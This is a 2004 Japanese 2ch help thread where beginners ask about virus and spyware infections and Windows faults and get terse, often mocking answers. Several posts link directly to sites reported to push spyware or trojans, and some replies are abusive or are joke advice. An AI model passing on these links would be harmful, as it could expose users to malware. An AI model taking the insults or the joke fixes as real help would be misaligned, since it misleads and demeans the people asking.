えろいひと"キタ━━━━ヽミ´∀`,,彡ノ━━━━!!!!"

626 :ひよこ名無しさん:04/07/30 12:37 ID:???
>>624
ちなみに、>>1からテンプレを全部やってから質問してくれ。
ルール違反だ。

で、やった後は出来た、出来なかったではだめで、
何をどのようにやったか具体的に書くこと。

627 :ひよこ名無しさん:04/07/30 13:44 ID:???
>>624
君も好きな人だね(・∀・)ニヤニヤ

628 :ひよこ名無しさん:04/07/30 13:52 ID:???
>>626
ここのテンプレじゃ治らない思うぞ・・・。

>>624
こっちのテンプレへどうぞ。
エロサイト見たら…助けてください!Part35
http://pc6.2ch.net/test/read.cgi/pcqa/1091090092/

629 :ひよこ名無しさん:04/07/30 16:34 ID:???
AppInit_DLLs で検索
約69件中
結構増えて来た

630 :ひよこ名無しさん:04/07/31 16:47 ID:BI3ptwHO
質問です。

WIN Meのノートパソコンを使っており、
C:_RESTOREフォルダの中にあるウィルス感染ファイルを削除したいのですが、
調べたところマイコンピュータのプロパティで
「システムの復元をOFFにした後にまた戻せばいい」とあったのですが、
見てみると始めからOFFになっていました。

一旦ONにしてみても、再起動したりOKを押した時点でまたOFFになっています。
ちなみにC:_RESTOREフォルダのファイル数は三万以上、容量は1.6GBです。

これはやはりウィルスが原因なのでしょうか?
わかる方がいればお教えください。


631 :ひよこ名無しさん:04/07/31 16:56 ID:???
過去にシステムの復元を実行したことがあるんだろ。

632 :ひよこ名無しさん:04/07/31 17:02 ID:???
>>630
マルチ
http://pc6.2ch.net/test/read.cgi/pcqa/1086590699/277

633 :630:04/07/31 17:11 ID:BI3ptwHO
>>632
とりあえず自分で調べてみたところ、
システムの復元の停止が有効とあったので試したところ、
その復元自体が出来なかったので
そのスレでシステム的な質問をするのはスレ違いだと思い
PC初心者総合スレで質問させていただいたところ、
ウィルスが原因だと思いこのスレで質問させていただきました。
結果的にマルチになってしまいすみません。

634 :630:04/07/31 17:12 ID:BI3ptwHO
>>631
少し調べてみます。
回答ありがとうございます。

635 :ひよこ名無しさん:04/07/31 19:02 ID:OoWAq6wK
OSがwindowsXPのパソコンを使ってるんですが、
ログイン後に自動的にログアウトしてしまい、
パソコンがパソコンとしての機能を果たしてくれません。

これはウィルスなんでしょうか?解決策があればどなたか教えてください

636 :ひよこ名無しさん:04/07/31 19:04 ID:???
ウイルスです

637 :635:04/07/31 19:11 ID:OoWAq6wK
解決策を教えていただけないでしょうか?
セーフティーモードで起動させてもログアウトされるし
マイクロソフトのホームページにも解決策がでてないんですが

638 :ひよこ名無しさん:04/07/31 19:16 ID:???
>>637
修復インストール。
http://support.microsoft.com/default.aspx?scid=kb%3bja%3b881207

メーカー製のPCだとXPのCD-ROMじゃなくてリカバリだから出来ないけどな。
お前、PCの型番等書いてないからな。


639 :ひよこ名無しさん:04/08/01 01:35 ID:+70JLl2L
VBS.Redlof.Aとか言うウィルスに感染しました。
急いでノートンインターネットセキュリティ入れたんですけど
ノートンアンチウィルスがインストール出来てないみたいで(ドライバがインストール出来ない?)
もう何がなにやら…
本当に申し訳ありませんが、どなたか助けて下さい!

因みにOSは98です。

640 :ひよこ名無しさん:04/08/01 01:38 ID:djdJ1QKk
2ちゃんブラウザでガイドライン板を開こうとすると、ノートンが「UNIX PENGUINを発見しました」と警告してきます
他の板では症状がでないのですが、何が原因と思われますか?

ちなみに、ブラウザはLIVE2ch、XPのIE最新版、火壁オフです。

641 :ひよこ名無しさん:04/08/01 01:38 ID:???
>>640
ノートンの誤反応

642 :ひよこ名無しさん:04/08/01 01:39 ID:???
>>640
ウイルスコードの一部をスレタイにしてスレ立ててるバカがいるから

643 :ひよこ名無しさん:04/08/01 01:42 ID:djdJ1QKk
どうもありがとうございました

644 :ひよこ名無しさん:04/08/01 01:42 ID:???
http://that3.2ch.net/test/read.cgi/gline/1090169335/
このスレか

645 :ひよこ名無しさん:04/08/01 01:45 ID:???
>>639
君には泥縄という言葉を贈る

646 :ひよこ名無しさん:04/08/01 02:14 ID:W27+D3hA
trojan backdoor
に罹ってるからAVGを立ち上げてウイルスを駆除してください、
というウインドウが出るのでAVGを走らせるのですが何も引っかかりません。
頻繁にこういうことがあります。
今日「a2」というソフトも走らせたのですが、何も引っかかりませんでした。

これはなんでしょうか?


647 :ひよこ名無しさん:04/08/01 03:24 ID:???
>>646
ここに登録されているのが諸悪の根源
http://www.trendmicro.co.jp/esolution/solutionDetail.asp?solutionId=9286

648 :ひよこ名無しさん:04/08/01 03:44 ID:???
>>646
レジストリからそこに登録されているのを削除したら、再起動してスキャンする。
きっとファイルが見つかるよ。
最近は、ステルス式のが出てきているのよね。嫌らしいね。

649 :646:04/08/01 04:03 ID:W27+D3hA
レスありがトン>>647>>648

>>648
AVGの警告ウインドウにでるファイル名を検索してみるんですが見つかりません。
これはつまりレジストリにもそのウイルスのいる場所がないっていうことですよね?

ああー、、自分でも恥ずかしいくらい文がしょぼい。
文がわからなかったらすいません。

650 :ひよこ名無しさん:04/08/01 04:59 ID:???
>>649
トロイでもいっぱいあるからねえ これかな?
http://www.mcafeesecurity.com/japan/security/virB2002.asp?v=BackDoor-ABH

651 :ひよこ名無しさん:04/08/01 05:28 ID:???
>>649
知り得た情報を全部正確に書かないと適当なレスしかつかない。
普通に考えたら、AVGの次にa2とは考えないね。
判断がつかないとしたらまず>>2のオンラインスキャンを全部やって
それぞれの結果を確認するぐらいのことは最初にやるべきだと思う。

652 :ひよこ名無しさん:04/08/01 15:11 ID:???
窓の杜 - 【NEWS】多くの解凍ソフトに指定外の場所へファイルが解凍されてしまう脆弱性が存在
http://www.forest.impress.co.jp/article/2004/07/30/arcsecurity.html

653 :ひよこ名無しさん:04/08/01 19:00 ID:???
Mad.damはウイルスですか?
駆除できないし情報も検索してもほぼ出てこないので…

654 :ひよこ名無しさん:04/08/01 19:50 ID:RTrD/mSD
Trojan.W32.vise.a
というのに感染してしまいました。
シマンテックでは情報がなかったので駆除方法が解りません。
どこか駆除方法など詳細のあるサイトはないでしょうか?

655 :ひよこ名無しさん:04/08/01 20:07 ID:???
>>654
自噴で調べろ
適当にしか書き込みもしないんだからな

656 :ひよこ名無しさん:04/08/01 20:12 ID:???
>>655
すみません、少し焦ってました

怪しいファイルを誤って実行してしまい、メモリ上をアンチウィルスソフトでスキャンしたところ
Trojan.W32.vise.aを駆除したと表示されました。
一応メモリ上からは駆除されたようなのですが、PEファイルに感染するタイプのようで
システムが破壊されていないかと思い、Windowsフォルダをスキャンしましたが
windowsフォルダからは発見されませんでした。

657 :ひよこ名無しさん:04/08/01 20:23 ID:???
>>656
Temporary Internet Files
ここだけに発見されて即効で駆除されたものは気にしなくてもいい
当然システムドライブは、スキャンしといた方がいいに越した事はないけどね

658 :ひよこ名無しさん:04/08/01 20:36 ID:???
>>657
どこで発見したかのログが残っていないので不明ですが
レジストリ、mp3、jpgなどのファイルは影響を受けていないようなので
とりあえず安心しました。今はドライブのスキャン終了待ちです。
お騒がせしました。

659 :ひよこ名無しさん:04/08/01 20:49 ID:???
外国製のフリーアンチウィルスソフトの話ってタブー?

660 :ひよこ名無しさん:04/08/01 20:52 ID:???
>>659
ソフトの話はこっち。 セキュリティ板に無料ソフトスレがある。
【初心者向】ウイルス対策ソフト質問スレ part3
http://pc6.2ch.net/test/read.cgi/pcqa/1086590699/

661 :ひよこ名無しさん:04/08/01 20:53 ID:???
>>660
おっとスマソです
ありがとん

662 :646:04/08/02 11:32 ID:JLIfZAdq
>>651
やはり他のソフトで調べてみたら新たにウイルスが見つかりますた。
助言ありがdございます。(・・)/

どなたかトロイの木馬系に強い駆除ソフト(フリー)を教えていただけませんか?

663 :ひよこ名無しさん:04/08/02 11:54 ID:5xPyqiqo
ノートンアンチ使ってるんですけど(しかも英語版)
ウィルススキャン始めるととんでもない数をスキャンしだして
いつまでたってもウィルス駆除してくれないんだけど・・・

664 :ひよこ名無しさん:04/08/02 11:55 ID:???
>>663
で?

665 :ひよこ名無しさん:04/08/02 12:01 ID:???
>>662
海外のフリーソフトでいくつかある。
ファイヤウォールで送信チェックできるんだから、必要ないと思うけど。

666 :ひよこ名無しさん:04/08/02 12:14 ID:???
無料のメールアドレスからウィルスが送信されているんですが
どうすればいいのでしょうか?
(あなたのアドレスからウィルスが
送信されていますという警告メールがきました)
ブラウザ上からの利用しかしてないのに、
何かに感染することはあるのでしょうか


667 :ひよこ名無しさん:04/08/02 12:23 ID:???
>>666
質問する時はID出して。
その警告メール自体があやしい可能性がある。いたずらや添付ウイルス付き。
誰かがメールアドレスを勝手に使ってるとかか、
メールを送ったことがある誰かがウイルスに感染してアドレス帳から取得→送信とかも。

668 :666:04/08/02 12:54 ID:kh8Q6uns
>>667
ありがとうございます
スキャンは週1でやっていますのでPC自体には問題ないかと思うんですが

勝手に使われている形跡は今のところなかったです。
なにかやるべき事とかありますでしょうか


669 :ひよこ名無しさん:04/08/02 12:57 ID:???
>>668
窓の手使え。

670 :ひよこ名無しさん:04/08/02 21:09 ID:???
最近よくPCが突然切れるのですが、これってウィルスですかね?
パワーランプが点滅してて、パワーボタン押しても応答しなくなるのでいつも電源ブチッってしてます。

671 :ひよこ名無しさん:04/08/02 22:38 ID:???
>>670
ホコリでも詰まってんだろ

672 :ひよこ名無しさん:04/08/02 23:29 ID:qsMxhms1
Trojan.Win32.Startpage.ixというウイルスの存在はスキャンで確認できたんですが
最新版のノートンでも駆除ができない、というかウイルスが発見されません。
どうしてでしょうか…

673 :ひよこ名無しさん:04/08/02 23:31 ID:???
>>672
どのフォルダ内で見つかったの?

674 :ひよこ名無しさん:04/08/02 23:32 ID:7JjGfRH0
Cameron Diaz画像集
http://www.sexydesktop.co.uk/diaz.htm

↑にアクセスして、スパイウェア?ってやつくらったみたいなんですけど
どうしたら削除できますか?何か、開くのが重くなったみたいです。

675 :ひよこ名無しさん:04/08/02 23:34 ID:???
>>674
何故スパイだと思ったの?

676 :ひよこ名無しさん:04/08/02 23:36 ID:7JjGfRH0
>>675
これが貼られていたスレの人が、そう書き込んでおられました。
それに、開くのが重くなったんです!

677 :ひよこ名無しさん:04/08/02 23:36 ID:???
>>674
あちこちに直リンすんなや禿!

678 :ひよこ名無しさん:04/08/02 23:38 ID:7JjGfRH0
>>677
どういうことですか?
何かまずかったなら謝ります。
PC初心者に近いんで許して下さい。

679 :ひよこ名無しさん:04/08/02 23:39 ID:qsMxhms1
>>673
CドライブのWINDOWS¥SYSTEM¥jldp.dllという所です

680 :ひよこ名無しさん:04/08/02 23:40 ID:???
>>674
症状は重くなっただけ?

681 :ひよこ名無しさん:04/08/02 23:41 ID:???
>>678
そのまま貼ると他のやつが踏むから先頭のhを抜けってこと。

682 :ひよこ名無しさん:04/08/02 23:43 ID:7JjGfRH0
>>681
本当にすみませんでした。
今後気をつけます。

683 :ひよこ名無しさん:04/08/02 23:44 ID:???
聞かれた事にさっさと答えろよ。

ウィルスチェックとスパイウェアチェックをやれ。

この分だと面倒臭そうなので降りた。

684 :ひよこ名無しさん:04/08/02 23:46 ID:7JjGfRH0
>>680=683
重くなっただけです。
すみませんでした。

685 :ひよこ名無しさん:04/08/02 23:49 ID:???
>>684
気にスンナ、ハゲ

686 :ひよこ名無しさん:04/08/02 23:49 ID:???
>>684
再起動してみ。

687 :ひよこ名無しさん:04/08/02 23:51 ID:7JjGfRH0
>>685
はい
でも、ハゲてはいないです
>>686
はい
でも、>>68さんに言われたウイルススキャンをやっているので・・・

688 :ひよこ名無しさん:04/08/02 23:51 ID:???
>>679
そこにウィルスがあるのなら そこだけノートンかけてみて。

689 :ひよこ名無しさん:04/08/02 23:57 ID:qsMxhms1
>>688
ノートンかけましたが発見されなかったです…

690 :ひよこ名無しさん:04/08/03 00:00 ID:???
奇奇怪怪。
実態のないウイルス出現。

ってか?

691 :ひよこ名無しさん:04/08/03 00:03 ID:???
>>689
スタートページが見知らぬアドレスになっていなければ問題無しだと思うよ
そのトロイ系はその類だから

692 :ひよこ名無しさん:04/08/03 00:04 ID:???
Trojan.Win32.Startpageならシマンテックで見つかるが
Trojan.Win32.Startpage.ixってのは無いな
ixって何?

693 :ひよこ名無しさん:04/08/03 00:05 ID:e1cl+KUH
マジですか?困ったなぁ…ちなみに今スパイウェアの方も削除し終えたんですが。
関係無いですね。

>>691
実はスタートページがabout:blankなんです…

694 :ひよこ名無しさん:04/08/03 00:05 ID:???
>>692
亜種

695 :ひよこ名無しさん:04/08/03 00:06 ID:???
情報の小出しで来たよ。

696 :ひよこ名無しさん:04/08/03 00:07 ID:???
スパイだな、それ
アドレスがabout:blankになってるだろ?
画面は何になってる?

697 :ひよこ名無しさん:04/08/03 00:09 ID:e1cl+KUH
>>696
ttp://www.ahnlab.co.jp/virusinfo/sec_vir_list.asp
と全く同じ状態です。スパイは今spy-botで削除したんですが。

698 :ひよこ名無しさん:04/08/03 00:10 ID:???
>>697
ウイルスです。

699 :ひよこ名無しさん:04/08/03 00:11 ID:???
>>697
これやってみたら

http://higaitaisaku.web.infoseek.co.jp/removeaboutblank.html

700 :ひよこ名無しさん:04/08/03 00:13 ID:e1cl+KUH
>>698
そうですよね、でも見つからないんです

>>699
ありがとうございます。でもウイルスとは別物っぽいよなぁ…

701 :ひよこ名無しさん:04/08/03 00:14 ID:???
>>700
だからスパイウェアだって言ってるだろ。>>683で決着付いてることなんだが。

702 :ひよこ名無しさん:04/08/03 00:16 ID:???
>>700
馬鹿か?
さっきからスパイウェアだって何人に言われてるんだよ
エロサイトスレのテンプレ実行してこい
全部やるまで質問禁止

703 :ひよこ名無しさん:04/08/03 00:17 ID:e1cl+KUH
>>701
じゃあspy-botで削除しきれないものがあったって事でしょうか?

704 :ひよこ名無しさん:04/08/03 00:17 ID:???
>>700
ウィルスではなく、スパイウェア=トロイの木馬

ウィルス=ファイルに寄生して

705 :ひよこ名無しさん:04/08/03 00:17 ID:???
>>703
その通りです。

706 :ひよこ名無しさん:04/08/03 00:20 ID:???
>スパイウェア=トロイの木馬
ちゃうわ

707 :ひよこ名無しさん:04/08/03 00:21 ID:???
まぁ、でも最近のスパイウェアはウィルスベンダはトロイとしてるね。

708 :ひよこ名無しさん:04/08/03 00:21 ID:???
>>703
spybotは特定のスパイの駆除を得意とするので、それ以外のスパイの駆除はあんまり得意でない

709 :700:04/08/03 01:20 ID:e1cl+KUH
エロサイトスレのテンプレのインターネット一時ファイルの削除というのを
やったら何事も無かったようにabout:blankの症状は消えました。
ただ、ANTIDOTE for PCというものでスキャンをしているのですが相変わらず
ウイルスが発見されてしまいます。ノートンでは見つかりません…

710 :ひよこ名無しさん:04/08/03 05:31 ID:???
>>709
だから何なの?

「ウィルスが発見されてしまいます。」

だけで、何か解決方法が示せると思ってるのか?
頭悪すぎるよ。君。

711 :ひよこ名無しさん:04/08/03 05:47 ID:xFiM9jwi
674さんの関連ですが私もHolly Balance の画像集を検索していて
まったく同じHP
ttp://www.sexydesktop.co.uk/holly.htmでスパイウェア
"TROJ_SCTHOUGHT.C"に感染してしまいました。
踏んだ瞬間、ウィルスバスターが緊急報告してくれました。
メッセージは"隔離できませんでした"とのこと。
シマンテックの対策HPでは、感染したファイルを全部削除しろ
と書いてあったのですが、ノートン使ってないので削除できません。
感染ファイルのある場所は
C:\Documents and Settings\username\Local Settings\Temporary Internet Files\Content.IE5\FW1WFZHO\install026[1].exe
ですが、エクスプローラではLocal Settingsホルダーが見当たりません。
どうしたらいいでしょうか?



712 :ひよこ名無しさん:04/08/03 06:00 ID:???
>>711
そう、それまだ感染って言わないね

713 :ひよこ名無しさん:04/08/03 06:17 ID:WcxKyAtL
普通、ウィルスメール(W32.Netsky.Q@mm)が来てもサーバ側で弾かれるが
最近ちょこちょこと弾かれず直接届く事が多い。 考えられる理由を
教えてくらはい。 サーバ名晒していいの? 



714 :ひよこ名無しさん:04/08/03 06:19 ID:iM7VIQwS
Nortonを起動させてると2ちゃんに書き込めません
バージョンは最新だと思います
セキュティのレベルはすべて推奨されてるレベルです
どうしたらいいですか

715 :ひよこ名無しさん:04/08/03 06:19 ID:???
>>714
買い換えろ、デブ。

716 :ひよこ名無しさん:04/08/03 06:20 ID:???
>>714
なんでFAQ読まないで質問するの?死ねば?

>>713
鯖に聞け

717 :714:04/08/03 06:23 ID:???
すいません 書き込む場所まちがえました

718 :ひよこ名無しさん:04/08/03 07:10 ID:xFiM9jwi
>>712
なんだよ、実際にダメージの症状が発生するまでは放っとけってか?
スレひととおりみたけど、評論めいたことばかりで、ちっとも役に立たないな。
こんなところで聞いたのが間違いだった。


719 :ひよこ名無しさん:04/08/03 07:12 ID:???
また逆切れかよ。

720 :ひよこ名無しさん:04/08/03 07:32 ID:???
口調の変化が素でこわいw

721 :初心者R:04/08/03 08:03 ID:Hhrxb52R
教えてください。
orgasmって名前のウイルスありますか?
消せないウィンドウ出たり、orgasmっていう作動しないプログラム?がデスクトップとかスタートメニューにいます。
ネット開くと海外エロサイトへ飛びます。
これウイルスですよね?

722 :ひよこ名無しさん:04/08/03 08:05 ID:???
>>721
スパイウェア。
エロサイトスレのテンプレやれ。

723 :初心者R:04/08/03 08:14 ID:Hhrxb52R
レスありがとうございます。
でも初心者なので用語わかりません...
テンプレって何ですか?

724 :ひよこ名無しさん:04/08/03 08:16 ID:Hhrxb52R
スパイウェアってなんですか?

725 :ひよこ名無しさん:04/08/03 08:41 ID:???
用語は自分で

726 :ひよこ名無しさん:04/08/03 08:42 ID:???
教えて厨UZEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE

727 :ひよこ名無しさん:04/08/03 08:51 ID:???
>>724
http://pc6.2ch.net/test/read.cgi/pcqa/1091090092/9

728 :ひよこ名無しさん:04/08/03 09:10 ID:???
PCがまともに使えなくなってから2ヶ月が過ぎました。
その間自分で色々やりましたが、もうお手上げです。
すみませんが、教えて下さい。
(windowsXPです)
1・まず5月にsasserに感染しました。この時はリカバリして使えるようになりました。
2・6月にまたsasseに感染しました。リカバリしても駄目で、ノートンではW32spybot.worm
や、その他5種類くらいのウィルスが見つかり、ノートンでは「削除できません」と出て
  しまいます。PCがまったく動かなくなり、もちろんネットにも繋げません。終了さえ出来なく
  なりました。
3・なんとか、リカバリして、ウィルスバスター2004を入れて、今に至ります。

しかし、バスターでウィルスは発見されていないのですが、PCがどうもおかしいのです。
電源を入れると、しばらくして「システムは深刻なエラーから回復されました。この症状を
windowsに送信するorしない」みたいな画面が出まして、再起動してしまいます。
再起動は1回のみです。ネットに繋ぐと、「サーバーが見つかりません」と出てしまいますが、
「更新」をするとちゃんと見れるようになります。後、速度がすごく遅くなりました。
光なのですが、ISDNの速度くらいになりました。

これはウィルスがまだいるのでしょうか?それとも他に何か問題があるのでしょうか?


729 :670:04/08/03 09:45 ID:???
>>671
最近掃除したばかり。
ってかほこりがつまっただけでそんな症状が?
PCってもろいな。

730 :ひよこ名無しさん:04/08/03 09:46 ID:???
>>729
>>671は熱暴走の事をいってるんだろう。

731 :670:04/08/03 09:58 ID:???
なるほどそういうことですたか。
とりあえず調べてみます。

732 :ひよこ名無しさん:04/08/03 10:02 ID:???
>>728
リカバリしてみないとわからない。

※E-mail欄(省略可) には何も記入しないこと。(ID出す→偽者対策・質問者の区別)

733 :728:04/08/03 10:19 ID:NMrxWQXK
※E-mail欄(省略可) には何も記入しないこと。(ID出す→偽者対策・質問者の区別)

すみません。↑守ってませんでした。
リカバリですか・・・。
というか、今まで何度もリカバリしたのに、ウィルスの症状みたいのは消えないのは
ちゃんとリカバリ出来てない、という事なのかも・・・と思っています。

バスターが邪魔してるのか?とか考えてみたり。


734 :ひよこ名無しさん:04/08/03 10:21 ID:???
>>733
違うよ。ネットに繋いだ瞬間に感染してるんだろ。

735 :ひよこ名無しさん:04/08/03 10:23 ID:RGTmiYRb
Spyware Doctor
Unable to create log.Please reinstall program.
ok

PCを起動すると、毎回、この様な小さなウインドウが出てきます(汗)
どうしたらいいのでしょうか?

736 :ひよこ名無しさん:04/08/03 10:24 ID:???
>>735
スパイウェア駆除。
エロサイトスレのテンプレだね。


737 :ひよこ名無しさん:04/08/03 10:25 ID:RGTmiYRb
>>736
spybot…ってやつでいいんですか?
それなら昨日何度もやったんですが

738 :ひよこ名無しさん:04/08/03 10:27 ID:???
>>737
ad-awareもな。

739 :ひよこ名無しさん:04/08/03 10:28 ID:???
>>737
脳内で勝手にフィルターかけずに、テンプレ全部やってきなさい。
全部やるのが面倒くさいなら、その表示が出ても我慢しなさい。

740 :ひよこ名無しさん:04/08/03 10:28 ID:RGTmiYRb
>>737
ad-awareとspybotってやつ違うんですか?
ad-awareってやつ英語なんで使えなくて(汗)

741 :ひよこ名無しさん:04/08/03 10:29 ID:???
>>740
テンプレを研究すればad-awareの使い方も簡単にわかると思うが。
単純に面倒臭いだけだろ?ならスパイウェア入りPCで我慢しろよ。

742 :ひよこ名無しさん:04/08/03 10:29 ID:???
>>740
テンプレのリンク先に、日本語化パッチへのリンクがある
ちゃんと隅から隅まで読め
向こうで同じ質問しても、「テンプレ読め」しか返ってこないぞ

743 :ひよこ名無しさん:04/08/03 10:31 ID:RGTmiYRb
>>741-742
すみませんでした。
がんばってみます。

744 :ひよこ名無しさん:04/08/03 10:34 ID:???
>>733
ちゃんと型番書け。
最初からXPが入ってる機種なんてたぶん1000種類以上あるぞ。
メモリが128MBでバスター入れれば重くなって当然だし、
バスターがブロックできないスパイウエアで重くなってる可能性もある。

745 :ひよこ名無しさん:04/08/03 11:10 ID:???
>1・まず5月にsasserに感染しました。この時はリカバリして使えるようになりました。
>2・6月にまたsasseに感染しました。

Windows Updateしてるかもあやすぃ


746 :728:04/08/03 11:34 ID:bUJTDBLU
>>744

説明不足すみません。
使ってるPCはSONY VAIO PCV−W500です。
(WindowsXP HomeEdition)
スパイウェアで重くなるんですか・・・。Ad-Awareというのが駆除してくれる
ようなので、それをいれてみます。

>>745 

それはちゃんとしています。


747 :ひよこ名無しさん:04/08/03 11:40 ID:???
>>746
これね。
http://www.vaio.sony.co.jp/Products/PCV-W500/spec_master.html

最近の悪質なスパイウエアはAd-Aware対策してて、駆除できないのも多い。

あと、強制終了とかのせいで、いろんな設定が無効になって重くなることもある。
ピンとこない場合は、リカバリするほうが早い。

748 :ひよこ名無しさん:04/08/03 11:49 ID:RGTmiYRb
>>735です。言われた通りadawareもやったのですが、まだ・・・
どうしたらいいのでしょうか(汗)

749 :ひよこ名無しさん:04/08/03 11:52 ID:???
>>748
なんか誤解したようだけど、256MBでもバスターを入れれば重いよ。
128MBより多少はマシだけど。

750 :ひよこ名無しさん:04/08/03 11:53 ID:???
>>748
※2回目以降の書込は、名前欄に最初に質問した際の「発言番号」を入力すること。

751 :735:04/08/03 11:56 ID:RGTmiYRb
>>750
すみませんでした。
以後気をつけます。

752 :728:04/08/03 12:02 ID:bUJTDBLU
>>747

そのPCです。

Ad-Awareいれてみて、症状がなくならないようだったら、リカバリするしか
ないのか・・・(><
長々と申し訳ないのですが、Cドライブの中に、「xerox」とかいう訳のわからない0バイトの
ファイルがいつのまにかありまして、削除も出来ないんです。
家に帰ったら、セーフモードで起動して削除を試してみたいと思ってますが、
普通リカバリしたら、そんなファイルも消えるんじゃないんでしょうか?
ところが、何度リカバリしてもその0バイトのファイルは消えずに残ってるんです。
リカバリがちゃんと出来てない、のも疑った方がよいですかね?




753 :735:04/08/03 12:03 ID:RGTmiYRb
>>752
僕も「xerox」あります!!!

754 :ひよこ名無しさん:04/08/03 12:04 ID:???
>>752
xeroxは正常なフォルダ。FAX機能用らしい。

755 :ひよこ名無しさん:04/08/03 12:05 ID:???
Ad-AwareやSpybot入れただけで駆除できると思ってないか?
それなら間違い。手動で削除しないといけない。

756 :735:04/08/03 12:06 ID:RGTmiYRb
>>755
含まれているとしたら、どこが考えられますか?

757 :ひよこ名無しさん:04/08/03 12:12 ID:???
>>735
そのまま訳せば、ログファイルを作成できないから、インストールし直せ。

758 :670:04/08/03 12:26 ID:tXhoOG0x
本体を開けてびっくり、とても熱かったですw
ファンが壊れているらしく、ほこりがたまっていました。
こんなくだらない質問に答えてくださってありがとうございました。

759 :ひよこ名無しさん:04/08/03 12:31 ID:???
>>735
とりあえず、セーフモード(立ち上げの最中F8ボタン連打)で
Ad-AwareとSpybotをやってみれ

760 :728:04/08/03 13:15 ID:E5mRGpH3
>>754

正常な機能だったんですかw
私もセーフモードでSpybotとAd-Awereやってみます。

もういいかげんに普通にPCを楽しみたい・・・。
何度か「更新」ボタンを連打すれば、ダウンロードできると思うので。


761 :ひよこ名無しさん:04/08/03 14:11 ID:g6uIB8M0
まったくの初心者です。
ノートンを開くと
購読サービス 期限切れ
とあります。
どーしたらいいのですか?

762 :ひよこ名無しさん:04/08/03 14:15 ID:???
>>761
窓の手使え。

763 :ひよこ名無しさん:04/08/03 14:16 ID:???
>>761
逝ってよし

次!

764 :ひよこ名無しさん:04/08/03 14:17 ID:g6uIB8M0
>>762窓の手とは、なんですか?
ありがとうございます。

765 :ひよこ名無しさん:04/08/03 15:04 ID:T00J53+L
http://bubalom.by.ru/luisa/gallery1.html
おそらくブラクラかウィルスであろうURL↑を間違えて踏んでしまいました・・・
「ページが表示されません」とでたんですけど、この場合は被害は無いのでしょうか?

766 :ひよこ名無しさん:04/08/03 15:06 ID:???
また直リンか。

767 :ひよこ名無しさん:04/08/03 15:11 ID:???
>>765
士ね
マジで氏ね屑

768 :ひよこ名無しさん:04/08/03 15:25 ID:T00J53+L
あ・・・ごめんなさい・・・間違えました・・・。
最低の屑ですね。ご迷惑をおかけしました・・・。

769 :ひよこ名無しさん:04/08/03 15:26 ID:???
>>765を踏んでしまいました・・・責任とって下さい!!

770 :ひよこ名無しさん:04/08/03 15:29 ID:T00J53+L
>>769
本当にすみませんでした・・。

771 :ひよこ名無しさん:04/08/03 15:30 ID:???
>>770
SpywareBlasterとか入れてるか?
或いはインターネットオプション>セキュリティに制限付きサイトとして登録されてるか。

772 :ひよこ名無しさん:04/08/03 15:44 ID:T00J53+L
>>771
あ、はい。
SpywareBlaster、PestPatrol、Ad-aware 6、Spybotを入れてます。


773 :ひよこ名無しさん:04/08/03 15:47 ID:???
>>772
SpywareBlasterでブロックされたんだよ。
問題は無いが、心配ならウィルス・Ad-aware等のチェックして終われ。


というか、質問する前に>>1読んで注意事項守れ。
>※2回目以降の書込は、名前欄に最初に質問した際の「発言番号」を入力すること。


774 :765:04/08/03 16:09 ID:T00J53+L
>>773
わかりました。アドバイス本当にありがとうございました。

変なURLを踏んでしまい、困惑して>>1も読まずに慌てて質問してしまいました。
自分のことしか考えず無礼で軽率な行為だったことを心から恥じお詫び申し上げます。
これからは注意事項を遵守し皆様に迷惑をかけないよう心掛けます。
本当にすみませんでした。



775 :ひよこ名無しさん:04/08/03 18:31 ID:???
>>765
もう、サイトが潰れてそうだな

776 :ひよこ名無しさん:04/08/03 22:30 ID:p9W4FbUy
すみませんが教えてください。
恐らく php? を含むURLだとおもうのですが、
ランキングサイトなどから、ある特定のリンクをクリックすると
ttp://66.230.167.104/sout.php?fc=40
に飛びます。上記URLからランダムにアダルトサイトに飛びます。

ウィルススキャンはしたし、spy-bot ad-awareなど
あらゆる対策はしましたがまだ治りません。
WINXP IE6.0です どなたかご存知の方教えてください。

777 :ひよこ名無しさん:04/08/04 00:23 ID:???
>>776
自分はわかんないんだけど、こっちの方が人が多いし、詳しい人も多そうだよ。
エロサイト見たら…助けてください!Part35
http://pc6.2ch.net/test/read.cgi/pcqa/1091090092/
(もうすぐ次スレ)
エロサイト見たら…助けてください!Part36
http://pc6.2ch.net/test/read.cgi/pcqa/1091521211/

778 :ひよこ名無しさん:04/08/04 00:23 ID:???
>>776
こっち行った方がいいよ
テンプレよく読んで、やってないものを実行後質問してください

エロサイト見たら…助けてください!Part35
http://pc6.2ch.net/test/read.cgi/pcqa/1091090092/


779 :ひよこ名無しさん:04/08/04 00:27 ID:4ctuWkx7
突然の質問すみません。
「あなたのサイトのページでウィルスが検索されました」
というメールをいただいたのですがどうすれば良いかわからず。
オンラインでウィルス検索をしても全然ひっかからず
駆除をしたくてもウィルスの名前がわからないので確実な対処方がわかりません。
こういう時はどうしたら良いのでしょうか?PC初期化した方が良いんですかね?

なにかアドバイスありましたら教えてくれると助かります。

780 :ひよこ名無しさん:04/08/04 00:28 ID:IiA4LnlL
・Panda/無償オンラインスキャン
http://www.pandasoftware.com/activescan/jp/activescan_principal.htm
  オンラインスキャンにしては珍しく、ウィルスの駆除も可能です。
  ただし滅茶苦茶時間が掛かります。※Internet Exprolerを使用してください
↑ここでスキャンしたいのですが、リンク先のページの一番上にある
「オンラインウィルスチェック」ってとこクリックしてもリンク切れのようだし
下の方の「無料体験版はこちらから」ってとこクリックすると
英文ばっかでわからんです。
どこをクリックすればスキャンできるのでしょうか?
無知ですみませんが教えてください。

781 :ひよこ名無しさん:04/08/04 00:32 ID:???
>>779
単なる誤解かもしれないし、いたずらかもしれない。
PCを初期化しても、サイトはそのままだし。
URLは出せないだろうから、友人にチェックしてもらうぐらいしかないじゃないか。

782 :779:04/08/04 00:37 ID:4ctuWkx7
>>781
迅速な対応ありがとうございます!
自分も誤解かと思ったのですが、以前からサイトを作っているタグの最後に
打ったことの無いタグが組み込まれていたりしていて
今までそれを消してアップしていたんです。
出来ればそのタグをコピペでここに載せた方が1番早いんではないかと思ったのですが
掲示板自体に影響はありませんかね?

783 :ひよこ名無しさん:04/08/04 00:39 ID:???
>>782
念のため、メモ帳とかで iを全角のiに置換してからここに貼れば
ノートンの御認識も起きないと思う。
無料レンタルHPサイトなら、スクリプトは付くけど、それじゃないのかな。

784 :ひよこ名無しさん:04/08/04 00:41 ID:???
>>780
切れてませんよ
画像の所クリックしたら別窓開きますが?

>>782
それがウィルスコードだったらノートン誤反応しまくり

785 :ひよこ名無しさん:04/08/04 00:45 ID:IiA4LnlL
>>784
